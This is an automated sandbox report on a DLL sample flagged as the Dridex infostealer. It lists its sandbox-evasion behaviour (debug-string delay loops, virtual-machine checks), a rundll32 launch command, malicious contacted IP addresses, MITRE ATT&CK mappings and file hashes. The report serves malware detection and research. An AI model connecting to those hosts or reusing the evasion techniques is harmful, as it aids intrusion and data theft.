                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion:

                      barindex
                      Tries to delay execution (extensive OutputDebugStringW loop)Show sources
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: OutputDebugStringW count: 1023
                      Source: C:\Windows\System32\loaddll32.exeWindow / User API: threadDelayed 1023Jump to behavior
                      Source: C:\Windows\System32\loaddll32.exeLast function: Thread delayed
                      Source: C:\Windows\System32\loaddll32.exeLast function: Thread delayed
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E480730 GetTokenInformation,GetSystemInfo,GetTokenInformation,0_2_6E480730
                      Source: Amcache.hve.7.drBinary or memory string: VMware
                      Source: Amcache.hve.7.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
                      Source: Amcache.hve.7.drBinary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                      Source: Amcache.hve.7.drBinary or memory string: VMware Virtual USB Mouse
                      Source: Amcache.hve.7.drBinary or memory string: VMware-42 35 9c fb 73 fa 4e 1b-fb a4 60 e7 7b e5 4a ed
                      Source: Amcache.hve.7.drBinary or memory string: VMware, Inc.
                      Source: Amcache.hve.7.drBinary or memory string: VMware Virtual disk SCSI Disk Devicehbin
                      Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.7.drBinary or memory string: VMware7,1
                      Source: Amcache.hve.7.drBinary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.7.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: Amcache.hve.7.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                      Source: WerFault.exe, 00000007.00000002.828834877.00000000046DD000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: Amcache.hve.7.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: Amcache.hve.7.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: Amcache.hve.7.drBinary or memory string: VMware, Inc.me
                      Source: WerFault.exe, 00000007.00000002.828906056.00000000047D0000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWX(n
                      Source: Amcache.hve.7.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                      Source: Amcache.hve.7.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E476D0C GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,0_2_6E476D0C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E483138 RtlAddVectoredExceptionHandler,0_2_6E483138
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\G7ABVJxc3Z.dll",#1Jump to behavior
                      Source: loaddll32.exe, 00000000.00000002.1053899342.00000000018E0000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.742448049.0000000002F00000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.739881173.0000000002F00000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.733270905.0000000003A00000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.734263987.0000000003A00000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: loaddll32.exe, 00000000.00000002.1053899342.00000000018E0000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.742448049.0000000002F00000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.739881173.0000000002F00000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.733270905.0000000003A00000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.734263987.0000000003A00000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: loaddll32.exe, 00000000.00000002.1053899342.00000000018E0000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.742448049.0000000002F00000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.739881173.0000000002F00000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.733270905.0000000003A00000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.734263987.0000000003A00000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: loaddll32.exe, 00000000.00000002.1053899342.00000000018E0000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.742448049.0000000002F00000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.739881173.0000000002F00000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.733270905.0000000003A00000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.734263987.0000000003A00000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,0_2_6E476D0C
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E476D0C GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,0_2_6E476D0C
                      Source: Amcache.hve.7.drBinary or memory string: c:\program files\windows defender\msmpeng.exe

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management InstrumentationDLL Side-Loading1Process Injection12Virtualization/Sandbox Evasion1OS Credential DumpingQuery Registry1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Process Injection12LSASS MemorySecurity Software Discovery21Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information1Security Account ManagerVirtualization/Sandbox Evasion1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Rundll321NTDSProcess Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsApplication Window Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsAccount Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncSystem Owner/User Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowSystem Information Discovery13Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 545442 Sample: G7ABVJxc3Z.dll Startdate: 26/12/2021 Architecture: WINDOWS Score: 80 22 162.241.33.132 UNIFIEDLAYER-AS-1US United States 2->22 24 217.160.5.104 ONEANDONE-ASBrauerstrasse48DE Germany 2->24 26 2 other IPs or domains 2->26 28 Found malware configuration 2->28 30 Multi AV Scanner detection for submitted file 2->30 32 Yara detected Dridex unpacked file 2->32 34 3 other signatures 2->34 9 loaddll32.exe 1 2->9         started        signatures3 process4 signatures5 36 Tries to delay execution (extensive OutputDebugStringW loop) 9->36 12 cmd.exe 1 9->12         started        14 rundll32.exe 9->14         started        process6 process7 16 rundll32.exe 12->16         started        18 WerFault.exe 9 14->18         started        process8 20 WerFault.exe 23 9 16->20         started       

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      G7ABVJxc3Z.dll65%VirustotalBrowse
                      G7ABVJxc3Z.dll67%ReversingLabsWin32.Infostealer.Dridex
                      G7ABVJxc3Z.dll100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      2.2.rundll32.exe.5b0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      3.0.rundll32.exe.3280000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      3.0.rundll32.exe.3280000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      3.2.rundll32.exe.3280000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      2.0.rundll32.exe.6e470000.2.unpack100%AviraHEUR/AGEN.1144420Download File
                      2.0.rundll32.exe.5b0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      3.2.rundll32.exe.6e470000.2.unpack100%AviraHEUR/AGEN.1144420Download File
                      3.0.rundll32.exe.6e470000.5.unpack100%AviraHEUR/AGEN.1144420Download File
                      0.2.loaddll32.exe.1180000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      2.0.rundll32.exe.6e470000.5.unpack100%AviraHEUR/AGEN.1144420Download File
                      0.2.loaddll32.exe.6e470000.2.unpack100%AviraHEUR/AGEN.1144420Download File
                      2.0.rundll32.exe.5b0000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      3.0.rundll32.exe.6e470000.2.unpack100%AviraHEUR/AGEN.1144420Download File

                      Domains

                      No Antivirus matches

                      URLs

                      No Antivirus matches

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://upx.sf.netAmcache.hve.7.drfalse
                        		high

                        Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public

                        IPDomainCountryFlagASNASN NameMalicious
                        162.241.33.132
                        		unknownUnited States
                        		46606UNIFIEDLAYER-AS-1UStrue
                        104.36.167.47
                        		unknownUnited States
                        		27640GIGASNET-ASUStrue
                        217.160.5.104
                        		unknownGermany
                        		8560ONEANDONE-ASBrauerstrasse48DEtrue
                        188.40.48.93
                        		unknownGermany
                        		24940HETZNER-ASDEtrue

                        General Information

                        Joe Sandbox Version:34.0.0 Boulder Opal
                        Analysis ID:545442
                        Start date:26.12.2021
                        Start time:17:25:28
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 6m 39s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Sample file name:G7ABVJxc3Z.dll
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Run name:Run with higher sleep bypass
                        Number of analysed new started processes analysed:23
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal80.troj.evad.winDLL@9/10@0/4
                        EGA Information:Failed
                        HDC Information:
                        • Successful, ratio: 56.1% (good quality ratio 52.2%)
                        • Quality average: 77.2%
                        • Quality standard deviation: 30.1%
                        HCA Information:
                        • Successful, ratio: 53%
                        • Number of executed functions: 24
                        • Number of non-executed functions: 7
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Sleeps bigger than 120000ms are automatically reduced to 1000ms
                        • Found application associated with file extension: .dll
                        Warnings:
                        Show All
                        • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                        • Excluded IPs from analysis (whitelisted): 92.122.145.220, 52.182.143.212
                        • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, onedsblobprdcus15.centralus.cloudapp.azure.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, arc.msn.com
                        • Not all processes where analyzed, report is missing behavior information

                        Simulations

                        Behavior and APIs

                        No simulations

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        162.241.33.132L0mddDYjoL.dllGet hashmaliciousBrowse
                          hMUh2Mkqyi.dllGet hashmaliciousBrowse
                            hMUh2Mkqyi.dllGet hashmaliciousBrowse
                              E972ciDmtE.dllGet hashmaliciousBrowse
                                E972ciDmtE.dllGet hashmaliciousBrowse
                                  4NEHGDB2q7.dllGet hashmaliciousBrowse
                                    4NEHGDB2q7.dllGet hashmaliciousBrowse
                                      ReMxcvxKeOzodickpenis.dllGet hashmaliciousBrowse
                                        ReMxcvxKeOzodickpenis.dllGet hashmaliciousBrowse
                                          UzgDinGRAz.dllGet hashmaliciousBrowse
                                            nr29dWSsgF.dllGet hashmaliciousBrowse
                                              UzgDinGRAz.dllGet hashmaliciousBrowse
                                                nr29dWSsgF.dllGet hashmaliciousBrowse
                                                  OQjpM0PPCp.dllGet hashmaliciousBrowse
                                                    zNMgAlNt7a.dllGet hashmaliciousBrowse
                                                      OQjpM0PPCp.dllGet hashmaliciousBrowse
                                                        zNMgAlNt7a.dllGet hashmaliciousBrowse
                                                          VowAWbKvhX.dllGet hashmaliciousBrowse
                                                            ZXD1iYQeIh.dllGet hashmaliciousBrowse
                                                              104.36.167.47G7ABVJxc3Z.dllGet hashmaliciousBrowse
                                                                L0mddDYjoL.dllGet hashmaliciousBrowse
                                                                  hMUh2Mkqyi.dllGet hashmaliciousBrowse
                                                                    hMUh2Mkqyi.dllGet hashmaliciousBrowse
                                                                      E972ciDmtE.dllGet hashmaliciousBrowse
                                                                        E972ciDmtE.dllGet hashmaliciousBrowse
                                                                          4NEHGDB2q7.dllGet hashmaliciousBrowse
                                                                            4NEHGDB2q7.dllGet hashmaliciousBrowse
                                                                              ReMxcvxKeOzodickpenis.dllGet hashmaliciousBrowse
                                                                                ReMxcvxKeOzodickpenis.dllGet hashmaliciousBrowse
                                                                                  UzgDinGRAz.dllGet hashmaliciousBrowse
                                                                                    nr29dWSsgF.dllGet hashmaliciousBrowse
                                                                                      UzgDinGRAz.dllGet hashmaliciousBrowse
                                                                                        nr29dWSsgF.dllGet hashmaliciousBrowse
                                                                                          OQjpM0PPCp.dllGet hashmaliciousBrowse
                                                                                            zNMgAlNt7a.dllGet hashmaliciousBrowse
                                                                                              OQjpM0PPCp.dllGet hashmaliciousBrowse
                                                                                                zNMgAlNt7a.dllGet hashmaliciousBrowse
                                                                                                  VowAWbKvhX.dllGet hashmaliciousBrowse
                                                                                                    ZXD1iYQeIh.dllGet hashmaliciousBrowse

                                                                                                      Domains

                                                                                                      No context

                                                                                                      ASN

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                      UNIFIEDLAYER-AS-1USG7ABVJxc3Z.dllGet hashmaliciousBrowse
                                                                                                      • 162.241.33.132
                                                                                                      L0mddDYjoL.dllGet hashmaliciousBrowse
                                                                                                      • 162.241.33.132
                                                                                                      hMUh2Mkqyi.dllGet hashmaliciousBrowse
                                                                                                      • 162.241.33.132
                                                                                                      hMUh2Mkqyi.dllGet hashmaliciousBrowse
                                                                                                      • 162.241.33.132
                                                                                                      QmRD3TL34pGet hashmaliciousBrowse
                                                                                                      • 98.131.204.234
                                                                                                      QiZ1RADVGt.xlsGet hashmaliciousBrowse
                                                                                                      • 192.185.6.31
                                                                                                      Aw8F7Ua3w7.xlsGet hashmaliciousBrowse
                                                                                                      • 192.185.6.31
                                                                                                      dSeuQsymrQ.exeGet hashmaliciousBrowse
                                                                                                      • 216.172.160.230
                                                                                                      1WaWsMTrjt.exeGet hashmaliciousBrowse
                                                                                                      • 216.172.160.230
                                                                                                      POWKlAddNj.exeGet hashmaliciousBrowse
                                                                                                      • 216.172.160.230
                                                                                                      wJb8YRaQ9Y.xlsGet hashmaliciousBrowse
                                                                                                      • 192.185.6.31
                                                                                                      LcTYOSCFws.exeGet hashmaliciousBrowse
                                                                                                      • 216.172.160.230
                                                                                                      8LuKQEfuX9.exeGet hashmaliciousBrowse
                                                                                                      • 192.185.5.67
                                                                                                      MZf48VAxT7.exeGet hashmaliciousBrowse
                                                                                                      • 216.172.160.230
                                                                                                      iOXn4DA38y.xlsGet hashmaliciousBrowse
                                                                                                      • 192.185.6.31
                                                                                                      wxSfUTFXM3.xlsGet hashmaliciousBrowse
                                                                                                      • 192.185.6.31
                                                                                                      GsWdBjZeXt.exeGet hashmaliciousBrowse
                                                                                                      • 216.172.160.230
                                                                                                      HvM9U2PXj8Get hashmaliciousBrowse
                                                                                                      • 76.163.41.198
                                                                                                      rAFAiRUA1V.dllGet hashmaliciousBrowse
                                                                                                      • 162.214.50.39
                                                                                                      J25211072U.xlsGet hashmaliciousBrowse
                                                                                                      • 192.185.6.31
                                                                                                      GIGASNET-ASUSG7ABVJxc3Z.dllGet hashmaliciousBrowse
                                                                                                      • 104.36.167.47
                                                                                                      L0mddDYjoL.dllGet hashmaliciousBrowse
                                                                                                      • 104.36.167.47
                                                                                                      hMUh2Mkqyi.dllGet hashmaliciousBrowse
                                                                                                      • 104.36.167.47
                                                                                                      hMUh2Mkqyi.dllGet hashmaliciousBrowse
                                                                                                      • 104.36.167.47
                                                                                                      E972ciDmtE.dllGet hashmaliciousBrowse
                                                                                                      • 104.36.167.47
                                                                                                      E972ciDmtE.dllGet hashmaliciousBrowse
                                                                                                      • 104.36.167.47
                                                                                                      4NEHGDB2q7.dllGet hashmaliciousBrowse
                                                                                                      • 104.36.167.47
                                                                                                      4NEHGDB2q7.dllGet hashmaliciousBrowse
                                                                                                      • 104.36.167.47
                                                                                                      ReMxcvxKeOzodickpenis.dllGet hashmaliciousBrowse
                                                                                                      • 104.36.167.47
                                                                                                      ReMxcvxKeOzodickpenis.dllGet hashmaliciousBrowse
                                                                                                      • 104.36.167.47
                                                                                                      UzgDinGRAz.dllGet hashmaliciousBrowse
                                                                                                      • 104.36.167.47
                                                                                                      nr29dWSsgF.dllGet hashmaliciousBrowse
                                                                                                      • 104.36.167.47
                                                                                                      UzgDinGRAz.dllGet hashmaliciousBrowse
                                                                                                      • 104.36.167.47
                                                                                                      nr29dWSsgF.dllGet hashmaliciousBrowse
                                                                                                      • 104.36.167.47
                                                                                                      OQjpM0PPCp.dllGet hashmaliciousBrowse
                                                                                                      • 104.36.167.47
                                                                                                      zNMgAlNt7a.dllGet hashmaliciousBrowse
                                                                                                      • 104.36.167.47
                                                                                                      OQjpM0PPCp.dllGet hashmaliciousBrowse
                                                                                                      • 104.36.167.47
                                                                                                      zNMgAlNt7a.dllGet hashmaliciousBrowse
                                                                                                      • 104.36.167.47
                                                                                                      VowAWbKvhX.dllGet hashmaliciousBrowse
                                                                                                      • 104.36.167.47
                                                                                                      ZXD1iYQeIh.dllGet hashmaliciousBrowse
                                                                                                      • 104.36.167.47

                                                                                                      JA3 Fingerprints

                                                                                                      No context

                                                                                                      Dropped Files

                                                                                                      No context

                                                                                                      Created / dropped Files

                                                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_4d42c1f24c11b6c9a2fc199d7a28c798fe9e5a_82810a17_173d852c\Report.wer
                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):65536
                                                                                                      Entropy (8bit):0.9654598579721348
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:IniV0oX3CHBUZMX4jed+RU/u7sHS274ItWc:4i7XqBUZMX4jeH/u7sHX4ItWc
                                                                                                      MD5:93091EC43D665EC917DA2B6DEF3C1986
                                                                                                      SHA1:C2F1761C9D079582704C4E1EB9D7B6E071E2B8A0
                                                                                                      SHA-256:06910F058548C44A52ABA2D0F95F71C2F84B7CB608702A4D630DB06A5191D98E
                                                                                                      SHA-512:8A855DE218DAAEDF1479D6134A8513E7ED9836202A41B85AC90B3CF02F48B23EEE6E8DD8A4598D27732A394AB3F2EB08FEA7969B4ADC47B9ECFB513F4BADB153
                                                                                                      Malicious:false
                                                                                                      Reputation:low
                                                                                                      Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.5.0.0.9.6.1.9.8.8.7.7.1.8.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.5.0.0.9.6.2.7.4.9.7.0.2.9.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.9.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.2.f.2.8.9.9.8.-.b.6.2.1.-.4.3.c.8.-.a.9.4.d.-.0.b.d.9.d.1.e.3.a.5.3.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.6.4.6.2.a.3.6.-.f.5.7.4.-.4.5.d.9.-.8.7.1.e.-.0.f.2.8.8.c.a.7.2.1.7.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.5.4.-.0.0.0.1.-.0.0.1.b.-.c.6.5.4.-.d.2.5.1.7.5.f.a.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.b.5.f.!.
                                                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_dd9d398ae70aa8478325646a49f7ebef948b8_82810a17_125d0cc0\Report.wer
                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):65536
                                                                                                      Entropy (8bit):1.0000448208544093
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:sqifB0oXkHVzOMjed+x8/u7sOS274It7c:sqifvXsVzOMje3/u7sOX4It7c
                                                                                                      MD5:717352CD42907A1560CC3A9878394AF7
                                                                                                      SHA1:8219062D9152D35481EACA6E77AB659CCC92C01D
                                                                                                      SHA-256:3B77FF498A4AD8C84A4FCC826A420B93C27EB86B2FA2867D3F78A5502B96EFFC
                                                                                                      SHA-512:DDA2C9E5ED4D60F91CC0636184F3EEDD2F9ACE92C9C3A8C2BCEBB1C7386C0EB0DFE9E8CB966542A3E11A65152F6D18C7A8B7D2DBCF6356F4BBDC89293D22C047
                                                                                                      Malicious:false
                                                                                                      Reputation:low
